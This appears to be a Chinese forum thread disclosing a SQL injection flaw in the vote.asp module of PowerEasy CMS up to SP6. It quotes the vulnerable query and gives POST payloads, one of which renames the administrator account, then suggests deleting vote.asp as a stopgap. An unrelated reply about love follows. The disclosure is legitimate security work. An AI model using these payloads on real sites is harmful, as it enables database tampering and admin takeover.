最新动易<=SP6 Vote.asp 注入漏洞
<SPAN>漏洞:动易<=SP6 Vote.asp 注入漏洞<BR><BR>影响版本:<=SP6<BR><BR>漏洞分析:<BR><BR>在动易系统的投票模块(vote.asp)使用了如下语句:<BR><BR>Update PE_Vote set answer" & VoteOption & "= answer" & VoteOption & "+1 where ID=" & ID<BR><BR>在VoteType不等于single的情况下,VoteOption变量过滤失效,导致入侵者恶意构造VoteOption变量通过post提交,注入数据库,篡改或获取数据库内容<BR><BR>此漏洞对SQL影响较大,对ACCESS版本影响甚微。<BR><BR>测试攻击代码:<BR><BR>VoteOption=1=user-/-&VoteType=Multi&Action=Vote&ID=3<BR><BR>VoteOption参数注入(其他的参数就没看了)<BR>他们先过滤了"--"再过滤";"<BR><BR>测试方法:<BR>VoteOption的值为1=1 update PE_Admin set adminname=0x61-;-时,修改管理员的用户名。<BR><BR>临时解决方案:<BR><BR>在动易官方未发布补丁之前,可以改名或删除vote.asp</SPAN>re:最新动易<=SP6 Vote.asp 注入漏洞
<P>世上没有什么再比男女之间的感情再复杂了,没有人能够像给数学一样给它下个定义!!!!</P><BR><P>人要在挫折中学会坚强,过去的一切只能用时间去淹没,没有爱又哪来的恨呢?</P><BR>
<P> </P>
页:
[1]